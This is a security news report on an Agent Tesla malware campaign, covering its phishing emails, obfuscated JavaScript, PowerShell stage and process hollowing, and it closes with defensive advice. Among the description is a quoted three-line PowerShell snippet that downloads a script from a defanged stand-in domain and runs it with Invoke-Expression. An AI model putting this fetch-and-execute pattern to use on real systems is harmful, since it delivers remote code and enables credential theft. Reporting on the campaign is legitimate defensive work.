Security researchers have identified a sophisticated malware campaign utilizing Agent Tesla variants delivered through elaborate multi-stage attack sequences.
The malware operation, discovered in mid-April 2025, leverages PowerShell scripts as a critical component in its infection chain, demonstrating increased technical complexity compared to earlier variants.
Cybercriminals behind this campaign have implemented a methodical approach beginning with socially engineered emails carrying archive attachments.
.png
)
These seemingly innocuous files contain obfuscated JavaScript that serves as the initial infection vector, designed to evade traditional detection mechanisms.
The attack sequence progressively unfolds through multiple stages, with each step hiding the true intent until the final payload execution.
Broadcom researchers noted that these Agent Tesla variants employ particularly sophisticated obfuscation techniques, making detection increasingly challenging for conventional security tools.
“The threat actors behind this campaign have demonstrated advanced capabilities in designing multi-stage attacks that can bypass many standard security measures,” explained the research team in their analysis.
Malware Campaign
The malware campaign poses significant risks to organizations across sectors, with the potential to harvest sensitive credentials, capture keystrokes, and exfiltrate confidential data.
The modular nature of the attack allows threat actors to adapt their techniques quickly when detection measures improve.
The infection sequence begins when users open the malicious attachment, triggering a hidden JavaScript file that initiates the attack chain.
The code executes and connects to command-and-control servers to download a PowerShell script, as shown in the execution sequence:-
$client = New-Object System.Net.WebClient
$script = $client.DownloadString('hxxp://malicious-domain[.]com/payload.ps1')
Invoke-Expression $scriptThis PowerShell script serves as the delivery mechanism for the final Agent Tesla payload, which gets loaded directly into memory and injected into legitimate Windows processes to maintain persistence while evading detection.
The malware utilizes process hollowing techniques to replace the code of a legitimate process with its malicious code, allowing it to operate under the guise of trusted system processes.
Researchers have identified multiple protection mechanisms that can detect various stages of this attack, including behavior-based detection of suspicious PowerShell activities and network monitoring for unexpected connections to certificate authorities.
The emergence of these sophisticated Agent Tesla variants highlights the continuing evolution of malware delivery techniques.
Organizations should implement comprehensive security measures including email filtering, PowerShell logging, and advanced endpoint protection to mitigate these threats effectively.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy
